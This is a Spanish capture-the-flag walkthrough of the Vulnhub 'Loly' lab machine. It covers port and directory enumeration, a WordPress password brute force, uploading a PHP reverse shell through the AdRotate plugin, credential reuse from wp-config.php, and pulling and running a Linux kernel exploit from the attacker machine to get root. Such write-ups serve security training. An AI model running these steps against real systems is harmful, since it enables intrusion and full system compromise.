[VULNHUB] Loly

Hoy vamos a hackear la maquina de Vulnhub llamada Loly. Podeis descargarla desde el siguiente enlace: Loly

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@aLiCe:~$ nmap -A -p- 192.168.146.132
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 22:03 CEST
Nmap scan report for 192.168.146.132
Host is up (0.00072s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.05 seconds
Vemos que solo tiene abierto el puerto 80, asi que lo exploramos un poco mas.

sml@aLiCe:~$ gobuster dir -u http://192.168.146.132 -w 
/usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.146.132
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/12 22:05:56 Starting gobuster
===============================================================
/wordpress (Status: 301)
===============================================================
2020/09/12 22:05:58 Finished
===============================================================
Vemos que tiene el directorio "wordpress". Enumeramos los usuarios con:

wpscan --url http://192.168.146.132/wordpress --enumerate -u
Vemos que aparece el usuario "loly". Hacemos bruteforce al usuario loly para ver si obtenemos su password para acceder a wordpress.

sml@aLiCe:~$ wpscan --url http://192.168.146.132/wordpress --usernames loly 
--passwords /usr/share/wordlists/rockyou.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.146.132/wordpress/ [192.168.146.132]
[+] Started: Sat Sep 12 22:10:43 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.146.132/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce
ss

[+] http://192.168.146.132/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%


[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 
<======================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando                                                     
                                   
Trying loly / corazon Time: 00:00:01 
<=========================================> (175 / 175) 100.00% Time: 00:00:01

[!] Valid Combinations Found:
 | Username: loly, Password: fernando

[!] No WPVulnDB API Token given, as a result vulnerability data has not been 
output.
[!] You can get a free API token with 50 daily requests by registering at 
https://wpvulndb.com/users/sign_up

[+] Finished: Sat Sep 12 22:11:00 2020
[+] Requests Done: 200
[+] Cached Requests: 25
[+] Data Sent: 96.89 KB
[+] Data Received: 109.146 KB
[+] Memory used: 951.316 MB
[+] Elapsed time: 00:00:17
Encontramos el password: fernando. Al acceder a http://192.168.146.132/wordpress/wp-admin vemos que nos redirige a loly.lc. Agregamos loly.lc a nuestro fichero /etc/hosts. Una vez agregado, nos logueamos en wordpress utilizando los crendeciales. Vemos que tiene instalado el plugin Adrotate. Vamos a Adrotate -> Manage Media. En nuestra maquina, preparamos una reverse shell en php y luego la comprimimos como un fichero .zip

sml@aLiCe:~$ cp /usr/share/webshell/php/php-reverse-shell.php .
sml@aLiCe:~$ mv php-reverse-shell.php rshell.php
sml@aLiCe:~$ nano rshell.php
sml@aLiCe:~$ zip rshell.zip rshell.php 
  adding: rshell.php (deflated 59%)
sml@aLiCe:~$ 
Subimos el fichero .zip utilizando Adrotate Manage Media. Ponemos nc a la escucha:

sml@aLiCe:~$ nc -nlvp 1234
listening on [any] 1234 ...
Accedemos a: http://loly.lc/wordpress/wp-content/banners/rshell.php

Low Shell



sml@aLiCe:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.146.131] from (UNKNOWN) [192.168.146.132] 59286
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 
x86_64 x86_64 x86_64 GNU/Linux
 13:47:01 up 44 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
Exploramos el sistema y miramos el fichero wp-config.php del directorio de wordpress para ver si obtenemos algun credencial.

www-data@ubuntu:/$ cat /var/www/html/wordpress/wp-config.php
---SNIP---
/** MySQL database username */
define( 'DB_USER', 'wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );
---SNIP---
Encontramos una password :) En el sistema existe el usuario llamado loly asi que probamos a loguearnos como loly usando la password recien encontrada.

su loly
Password: lolyisabeautifulgirl
loly@ubuntu:~$ 
Ya somos loly! Seguimos explorando el sistema.

loly@ubuntu:~$ cat /etc/issue
Ubuntu 16.04.1 LTS \n \l
loly@ubuntu:~$ uname -a
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 
x86_64 x86_64 x86_64 GNU/Linux

Privilege Escalation


Vemos que es un Ubuntu 16.04 y con Kernel 4.4.0-31. Buscamos un exploit y encontramos[1] Lo descargamos en nuestra maquina y lo transferimos a la maquina victima.

loly@ubuntu:~$ wget http://192.168.146.131/45010.c
wget http://192.168.146.131/45010.c
--2020-09-12 15:05:47--  http://192.168.146.131/45010.c
Connecting to 192.168.146.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [application/octet-stream]
Saving to: ‘45010.c’

45010.c             100%[===================>]  13.41K  --.-KB/s    in 0s      

2020-09-12 15:05:47 (443 MB/s) - ‘45010.c’ saved [13728/13728]
Compilamos.

loly@ubuntu:~$ gcc -o 4 45010.c
Y ejecutamos!

loly@ubuntu:~$ ./4
./4
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and 
linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity 
kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88007973af00
[*] Leaking sock struct from ffff880075daddc0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880072e50840
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880072e50840
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) 
groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
,1000(loly)

root.txt



# cd /root
# ls
root.txt
# cat root.txt
  ____               ____ ____  ____  
 / ___| _   _ _ __  / ___/ ___||  _ \ 
 \___ \| | | | '_ \| |   \___ \| |_) |
  ___) | |_| | | | | |___ ___) |  _ < 
 |____/ \__,_|_| |_|\____|____/|_| \_\
                                      
Congratulations. I'm BigCityBoy

End


Y con esto ya seriamos root de la maquina. [1]https://www.exploit-db.com/exploits/45010